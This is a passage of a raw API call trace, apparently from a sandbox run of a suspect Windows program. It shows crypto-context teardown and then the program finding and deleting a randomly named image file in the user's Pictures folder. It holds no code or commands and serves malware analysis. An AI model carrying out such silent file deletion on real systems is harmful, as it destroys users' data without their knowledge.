[0248.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0248.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0248.058] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0248.058] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0248.058] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.058] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0248.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0248.058] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0248.058] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.059] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0248.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0248.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0248.059] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0248.059] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0248.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0248.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0248.059] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.059] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0248.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0248.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0248.059] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0248.059] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.059] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0248.059] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0248.059] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0248.060] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0248.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0248.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0248.060] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0248.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0248.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0248.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0248.060] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0248.060] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.060] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0248.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0248.060] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0248.060] FreeLibrary (hLibModule=0x756e0000) returned 1 [0248.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0248.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.061] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0248.061] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0248.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0248.061] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0248.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0248.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0248.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0248.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0248.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0248.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0248.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0248.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0248.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0248.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0248.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0248.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0248.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0248.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0248.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0248.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51418 [0248.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0248.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0248.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0248.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0248.062] CloseHandle (hObject=0x2a0) returned 1 [0248.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0248.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0248.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0248.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0248.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0248.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0248.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0248.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0248.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0248.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0248.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0248.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0248.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0248.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0248.064] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0248.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0248.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0248.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0248.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0248.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0248.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0248.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0248.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0248.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0248.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0248.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0248.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0248.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51508 [0248.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0248.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0248.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0248.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0248.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0248.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0248.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0248.064] CloseHandle (hObject=0x2d0) returned 1 [0248.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0248.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0248.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0248.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0248.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0248.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0248.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0248.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0248.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0248.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0248.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0248.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0248.109] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0248.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0248.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0248.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0248.197] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0248.198] TranslateMessage (lpMsg=0x8cf968) returned 0 [0248.198] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0248.198] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0248.198] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0248.198] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0248.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0248.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0248.198] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0248.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0248.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0248.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0248.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0248.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0248.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0248.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0248.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0248.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0248.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0248.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0248.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0248.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0248.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0248.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0248.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0248.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0248.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0248.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e58910 [0248.199] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/BspkZBQYHi.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\BspkZBQYHi.bmp", lpFilePart=0x8cedf4*="BspkZBQYHi.bmp") returned 0x27 [0248.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0248.199] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\BspkZBQYHi.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\bspkzbqyhi.bmp")) returned 0x20 [0248.199] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\BspkZBQYHi.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917da530, ftCreationTime.dwHighDateTime=0x1d5e2bb, ftLastAccessTime.dwLowDateTime=0x59405080, ftLastAccessTime.dwHighDateTime=0x1d5ec9f, ftLastWriteTime.dwLowDateTime=0x59405080, ftLastWriteTime.dwHighDateTime=0x1d5ec9f, nFileSizeHigh=0x0, nFileSizeLow=0x48e1, dwReserved0=0x1, dwReserved1=0x1c, cFileName="BspkZBQYHi.bmp", cAlternateFileName="BSPKZB~1.BMP")) returned 0xa87690 [0248.199] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\BspkZBQYHi.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\bspkzbqyhi.bmp")) returned 1 [0248.238] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917da530, ftCreationTime.dwHighDateTime=0x1d5e2bb, ftLastAccessTime.dwLowDateTime=0x59405080, ftLastAccessTime.dwHighDateTime=0x1d5ec9f, ftLastWriteTime.dwLowDateTime=0x59405080, ftLastWriteTime.dwHighDateTime=0x1d5ec9f, nFileSizeHigh=0x0, nFileSizeLow=0x48e1, dwReserved0=0x1, dwReserved1=0x1c, cFileName="BspkZBQYHi.bmp", cAlternateFileName="BSPKZB~1.BMP")) returned 0 [0248.238] FindClose (in: hFindFile=0xa87690 | out: hFindFile=0xa87690) returned 1 [0248.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0248.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0248.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0248.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0248.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0248.238] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0248.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0248.238] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0248.238] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0248.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0248.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0248.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0248.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0248.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0248.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0248.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0248.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0248.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0248.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0248.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0248.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0248.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0248.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0248.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0248.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0248.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0248.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0248.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0248.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0248.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0248.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e58910 [0248.239] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/BspkZBQYHi.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\BspkZBQYHi.bmp", lpFilePart=0x8cf650*="BspkZBQYHi.bmp") returned 0x27 [0248.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0248.239] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\BspkZBQYHi.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\bspkzbqyhi.bmp")) returned 0xffffffff [0248.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0248.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0248.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0248.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0248.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0248.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0248.240] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0248.240] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.240] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0248.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0248.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0248.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0248.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0248.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0248.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: 